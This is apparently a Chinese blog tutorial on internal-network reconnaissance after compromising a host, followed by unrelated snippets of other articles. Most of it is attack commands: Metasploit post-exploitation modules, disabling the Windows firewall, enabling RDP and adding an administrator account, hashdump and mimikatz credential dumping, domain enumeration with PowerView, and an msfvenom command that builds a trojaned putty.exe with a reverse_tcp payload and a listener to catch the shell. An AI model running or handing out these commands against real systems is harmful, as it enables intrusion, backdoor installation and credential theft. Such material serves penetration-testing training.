内网渗透-内网信息收集
内网信息收集
前言
当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。
msf模块中的信息收集
Msf模块
run post/
run post/windows/gather/
获取系统的分区情况
forensics(取证的模块)
run post/windows/gather/forensics/enum_drives
检测是否是虚拟机
run post/windows/gather/checkvm
靶机运行了哪些服务
run post/windows/gather/enum_services
安装了哪些应用
run post/windows/gather/enum_applications
是否有文件共享
run post/windows/gather/enum_shares
最近的操作
run post/windows/gather/dumplinks
安装了哪些补丁
run post/windows/gather/enum_patches
信息收集
scraper(是个脚本)
run scraper
收集完之后,会加载在指定文件
到文件中查看收集内容
cd /root/.msf4/log/scripts/
ls
cd scraper/
ls
cd 到指定的文件
ls
cat zhi.txt
显示乱码的话
chcp 65001
回到正常编码
run winenum
查看系统的路由,文件
msf反弹shell后的信息收集
MSF反弹shell
chcp 65001(返回的是utf-8的代码)
netsh advfirewall set allprofiles state off(关闭防火墙)
netsh advfirewall show allprofiles(查看所有配置)
shutdown -r -f -t 0(-f 强制重启),立即重启
看看3389端口
打开3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e
利用该命令,在目标主机上添加用户
run getgui -u admin -p admin (设置密码是)
net localgroup adminstrators admin /add
(1)MSF信息收集
远程桌面连接
window(mstsce)
kali (rdesktop -u username -p password ip)
获取哈希值
查看远程桌面
screenshot
use espia
screengrab
screenshare
得到哈希值密码破解时权限不够
如何提高权限
pid迁移
getpid
ps 查进程,找NT SYSTEM的进程pid,svhost
pid迁移,migrating pid
getuid
hashdump 获得哈希值
(2)凭证信息收集
window密码破解工具
mimikatz
(在内存中获取的密码)
https://github.com/gentilkiwi/mimikatz/releases(win10下载网址)
在window下使用是需要管理员权限的
图片中是获得明文密码的语句
privilege::debug //提升权限
2.wce
wce.exe -w 获取明文密码(只适用于win7的低版本)
3.pwddump7
得到hash值后可以放到这个网站去进行破解得到明文
https://www.objectif-securite.ch/ophcrack
http://www.cmd5.com/Default.aspx
4.procdump(免查杀的功能)
内网信息收集
先查看是否存在域
查看网段(s扫描器)
s.exe syn 192.168.0.0 192.168.255.255 80
抓包分析网络流量(分析流量看网段)meterpreter 抓取目标机所在网络流量
看进程
tasklist
netstat -ano
netstat -lntp(linux)
systeminfo(查看补丁列表)
net share
net user 查看本机共享列表和课访问的域共享列表
net localgroup admininistrators
query user || qwinsta 查看在线用户
route print(查看路由)
arp -a(同一网段的缓存表)
关闭防火墙
netsh advfirewall set allprofiles state off(03以后)
net sh firewall show config(查看防火墙配置)
netsh(可用于端口转发,连接内网时用)
域环境信息收集
远程登录不安全,用msf反弹shell比较安全
whoami /all(查看SID域账号,用于后面的票据伪造)
net user /domain 域中的用户
net time /domain 查看域控
net group “Domain computer” /domain 查看域控制器组
nbtscan(扫描同一网段中有哪些主机)
net view /domain 查询域
net group “domain computers” /domain 查询所有与成员计算机列表
cls 清屏
net accounts /domain 获取域密码信息
域内管理员信息
net group “domain admins” /domain 查询域管理员用户
msf加载powershell脚本进行信息收集
msf中信息收集工具
在会话中输入run winenum
powersploit
ls
找到路径
cd Recon
回到会话中
load powershell
powershell_import 刚刚的Recon的路径/PowerView.ps1
加载成功
powershell_execute get-NetDomain 查看当前的域有哪些
powershell_execute get-NetUser 当前的用户
powershell_execute get-NetComputer 扫域名
powershell_execute get-NetProcess 进程
扫端口
powershell_import 刚刚的Recon的路径/Invoke-Portscan.ps1
powershell_execute invoke-portscan 192.168.8.1,192.168.8.200 -ports “21,22,80,445,139”
empire(域渗透,内网收集)(在kali中打开)
./empire
我在kali中给大家演示一下powershell中的powersploit脚本,进行信息收集
首先就是在msf中生成一个后门程序shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.128 lport=4444 -x putty.exe -e x86/shikata_ga_nai -f exe -o shell.exe
将shell.exe上传到靶机中,点击回连shell,在kali中进行监听,在kali中打开msf,设置参数,进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.231.128
set lport 4444
run
进行一系列设置后,我们点击程序,发现返回了会话。
我们在kali中打开powersploit,找到这这个脚本,PowerView.ps1
找到这个路径
/usr/share/windows-resources/powersploit/Recon
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1
在回到msf中加载powershell
load powershell
导入模块
powershell_import /usr/share/windows-resources/powersploit/Recon//Powerview.ps1
执行脚本
powershell_execute get-NetDomain
我这里由于是用我本机做的实验,可能拿到的权限不是很高,所以不能做下一步的收集,但是对于win7的机器还是可以进行信息收集的
我们进行端口扫描
导入模块
powershell_import /usr/share/windows-resources/powersploit/Recon/Invoke-Portscan.ps1
执行脚本
powershell_execute invoke-portscan 192.168.219.1,192.168.219.200 -ports “21,22,80,445,139”
端口扫描成功了。我们看看另外一个扫描方法吧。
run winenum
这里进行一系列自动化的信息收集,,将扫描结果输出到报告中,这里显示输出到以下文档中
/root/.msf4/logs/scripts/winenum/LAPTOP-5QFMU9N1_20220920.4003/LAPTOP-5QFMU9N1_20220920.4003.txt
我们进行查看文档
可能还是因为权限的问题,只能扫到这么多的信息了,但对于其他靶机来说,应该会有更全面的扫描结果的。
后记
内网的信息收集就讲解到这了,渗透的信息收集至关重要,对于后渗透阶段,有着举足轻重的作用,直接决定着后渗透阶段的战果如何。后面还有内网的代理穿透,以及横向移动,权限维持,痕迹清除等阶段,有时间,都会给大家总结的噢。
黑客渗透视频教程下方免费领~
免费领取安全学习资料包!(私聊进群一起学习,共同进步)
https://docs.qq.com/doc/DRGJHbUxpTWR2Y3lq
相关文章:
内网渗透-内网信息收集
内网信息收集 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的…...
LeetCode解法汇总2520. 统计能整除数字的位数
目录链接: 力扣编程题-解法汇总_分享记录-CSDN博客 GitHub同步刷题项目: https://github.com/September26/java-algorithms 原题链接:力扣(LeetCode)官网 - 全球极客挚爱的技术成长平台 描述: 给你一个整…...
Lua语言编写爬虫程序
以下是一个使用luasocket-http库和Lua语言编写的爬虫程序。此程序使用了https://www.duoip.cn/get_proxy的代码。 -- 引入所需的库 local http require("socket.http") local ltn12 require("ltn12") local json require("json") -- 获取…...
安防监控项目---概要
文章目录 前言一、项目需求二、环境介绍三、关键点四、主框架分析总结 前言 各位小伙伴,在蛰伏了将近有半年的时间又要和大家分享新的知识了,这次和大家分享的是一个项目,因此呢我准备分项目阶段去和大家分享,希望大家都能够在每…...
数仓经典面试题
1.什么是数据仓库?请谈谈你对数据仓库的理解。 数据仓库是一个用于存储和管理数据的系统,它可以将分散的、异构的数据源中的数据进行抽取、转换、清洗和整合,然后按照一定的模型和架构进行组织和存储,以便更好地支持决策分析和业…...
【ARM Coresight 系列文章 15.2 – components power domain 详细介绍】
文章目录 1.1. Coresight 电源域模型1.1.1 CDBGPWRUPREQ 和 CDBGPWRUPACK1.1.2 CSYSPWRUPREQ 和 CSYSPWRUPACK1.1.3 Power Domain ID In RomTable1.1.4 Power domain entries1.1.5 Algorithm to discover power domain IDs1.1.6 Debug power requests1.1.7 System power reques…...
Flutter Android IOS 获取通讯录联系人列表
1.在pubspec.yaml 文件中添加 contacts_service 和 permission_handler 插件的依赖: dependencies:contacts_service: ^0.6.3 #获取联系人permission_handler: ^11.0.1 #权限请求2.在你的 Dart 代码中,导入 contacts_service 插件: impo…...
Spring Boot集成SpringFox 3.0与Pageable参数处理
Springfox 3.0有多个模块,提供了spring boot starter,与Spring Boot集成时仅需引入springfox-boot-starter,如下: <dependency><groupId>io.springfox</groupId><artifactId>springfox-boot-starter<…...
2、基于pytorch lightning的fabric实现pytorch的多GPU训练和混合精度功能
文章目录 承接 上一篇,使用原始的pytorch来实现多GPU训练和混合精度,现在对比以上代码,我们使用Fabric来实现相同的功能。关于Fabric,我会在后续的博客中继续讲解,是讲解,也是在学习。通过fabric,可以减少代码量&#…...
python版opencv人脸训练与人脸识别
1.人脸识别准备 使用的两个opencv包 D:\python2023>pip list |findstr opencv opencv-contrib-python 4.8.1.78 opencv-python 4.8.1.78数据集使用前一篇Javacv的数据集,网上随便找的60张图片,只是都挪到了D:\face目录下方便遍历 D:\face\1 30张刘德华图片…...
计算机视觉-数学基础*变换域表示
被研究最多的图像(或任何序列数据)变换域表示是通过傅 里叶分析 。所谓的傅里叶表示就是使用 正弦函数的线性组合来表示信号。对于一个给定的图像I(n1,n2) ,可以用如下方式分解它(即逆傅里叶变换): 其中&a…...
小程序如何设置自取规则
在小程序中,自取规则是指当客户下单时选择无需配送的情况下,如何设置相关的计费方式、指定时段费用、免费金额、预定时间和起取金额。下面将详细介绍如何设置这些规则,以便更好地满足客户的需求。 在小程序管理员后台->配送设置->自…...
Elasticsearch分词器-中文分词器ik
文章目录 使用standard analysis对英文进行分词使用standard analysis对中文进行分词安装插件对中文进行友好分词-ik中文分词器下载安装和配置IK分词器使用ik_smart分词器使用ik_max_word分词器 借助Nginx实现ik分词器自定义分词网络新词 ES官方文档Text Analysis 使用standard…...
ITSS信息技术服务运行维护标准符合性证书申请详解及流程
ITSS信息技术服务运行维护标准符合性证书 认证介绍 ITSS(InformationTechnologyServiceStandards,信息技术服务标准,简称ITSS)是一套成体系和综合配套的信息技术服务标准库,全面规范了IT服务产品及其组成要素,用于指导实施标准化…...
Inbound marketing的完美闭环:将官网作为营销枢纽,从集客进化为入站
Inbound marketing即入站营销的运作方式不同于付费广告,你需要不断地投入才能获得持续的访问量。而你的生意表达内容一经创建、发布,就能远远不断地带来流量。 Inbound marketing也被翻译作集客营销,也就是美国知名的营销SaaS企业hubspot所主…...
SQL On Pandas最佳实践
SQL On Pandas最佳实践 1、PandaSQL1.1、PandaSQL简介1.2、Pandas与PandaSQL解决方案对比1.3、PandaSQL支持的窗口函数1.4、PandaSQL综合使用案例2、DuckDB2.1、DuckDB简介2.2、SQL操作(SQL On Pandas)2.3、逻辑SQL(DSL on Pandas)2.4、DuckDB on Apache Arrow2.5、DuckDB …...
如何批量给视频添加logo水印?
如果你想为自己的视频添加图片水印,以增强视频的辨识度和个性化,那么你可以使用固乔剪辑助手软件来实现这一需求。下面就是详细的操作步骤: 1.下载并打开固乔剪辑助手软件,这是一款简单易用的视频剪辑软件,功能丰富&am…...
数据挖掘和大数据的区别
数据挖掘 一般用于对企业内部系统的数据库进行筛选、整合和分析。 操作对象是数据仓库,数据相对有规律,数据量较少。 大数据 一般指对互联网中杂乱无章的数据进行筛选、整合和分析。 操作对象一般是互联网的数据,数据无规律,…...
Go之流程控制大全: 细节、示例与最佳实践
引言 在计算机编程中,流程控制是核心的组成部分,它决定了程序应该如何根据给定的情况执行或决策。以下是Go语言所支持的流程控制结构的简要概览: 流程控制类型代码if-else条件分支if condition { } else { }for循环for initialization; con…...
FLStudio2024最新破解版注册机
水果音乐制作软件FLStudio是一款功能强大的音乐创作软件,全名:Fruity Loops Studio。水果音乐制作软件FLStudio内含教程、软件、素材,是一个完整的软件音乐制作环境或数字音频工作站... FL Studio21简称FL 21,全称 Fruity Loops Studio 21,因此国人习惯叫…...
【kafka】Golang实现分布式Masscan任务调度系统
要求: 输出两个程序,一个命令行程序(命令行参数用flag)和一个服务端程序。 命令行程序支持通过命令行参数配置下发IP或IP段、端口、扫描带宽,然后将消息推送到kafka里面。 服务端程序: 从kafka消费者接收…...
K8S认证|CKS题库+答案| 11. AppArmor
目录 11. AppArmor 免费获取并激活 CKA_v1.31_模拟系统 题目 开始操作: 1)、切换集群 2)、切换节点 3)、切换到 apparmor 的目录 4)、执行 apparmor 策略模块 5)、修改 pod 文件 6)、…...
Robots.txt 文件
什么是robots.txt? robots.txt 是一个位于网站根目录下的文本文件(如:https://example.com/robots.txt),它用于指导网络爬虫(如搜索引擎的蜘蛛程序)如何抓取该网站的内容。这个文件遵循 Robots…...
听写流程自动化实践,轻量级教育辅助
随着智能教育工具的发展,越来越多的传统学习方式正在被数字化、自动化所优化。听写作为语文、英语等学科中重要的基础训练形式,也迎来了更高效的解决方案。 这是一款轻量但功能强大的听写辅助工具。它是基于本地词库与可选在线语音引擎构建,…...
VM虚拟机网络配置(ubuntu24桥接模式):配置静态IP
编辑-虚拟网络编辑器-更改设置 选择桥接模式,然后找到相应的网卡(可以查看自己本机的网络连接) windows连接的网络点击查看属性 编辑虚拟机设置更改网络配置,选择刚才配置的桥接模式 静态ip设置: 我用的ubuntu24桌…...
LangChain知识库管理后端接口:数据库操作详解—— 构建本地知识库系统的基础《二》
这段 Python 代码是一个完整的 知识库数据库操作模块,用于对本地知识库系统中的知识库进行增删改查(CRUD)操作。它基于 SQLAlchemy ORM 框架 和一个自定义的装饰器 with_session 实现数据库会话管理。 📘 一、整体功能概述 该模块…...
STM32HAL库USART源代码解析及应用
STM32HAL库USART源代码解析 前言STM32CubeIDE配置串口USART和UART的选择使用模式参数设置GPIO配置DMA配置中断配置硬件流控制使能生成代码解析和使用方法串口初始化__UART_HandleTypeDef结构体浅析HAL库代码实际使用方法使用轮询方式发送使用轮询方式接收使用中断方式发送使用中…...
2025年- H71-Lc179--39.组合总和(回溯,组合)--Java版
1.题目描述 2.思路 当前的元素可以重复使用。 (1)确定回溯算法函数的参数和返回值(一般是void类型) (2)因为是用递归实现的,所以我们要确定终止条件 (3)单层搜索逻辑 二…...
深入解析光敏传感技术:嵌入式仿真平台如何重塑电子工程教学
一、光敏传感技术的物理本质与系统级实现挑战 光敏电阻作为经典的光电传感器件,其工作原理根植于半导体材料的光电导效应。当入射光子能量超过材料带隙宽度时,价带电子受激发跃迁至导带,形成电子-空穴对,导致材料电导率显著提升。…...
算法刷题-回溯
今天给大家分享的还是一道关于dfs回溯的问题,对于这类问题大家还是要多刷和总结,总体难度还是偏大。 对于回溯问题有几个关键点: 1.首先对于这类回溯可以节点可以随机选择的问题,要做mian函数中循环调用dfs(i&#x…...
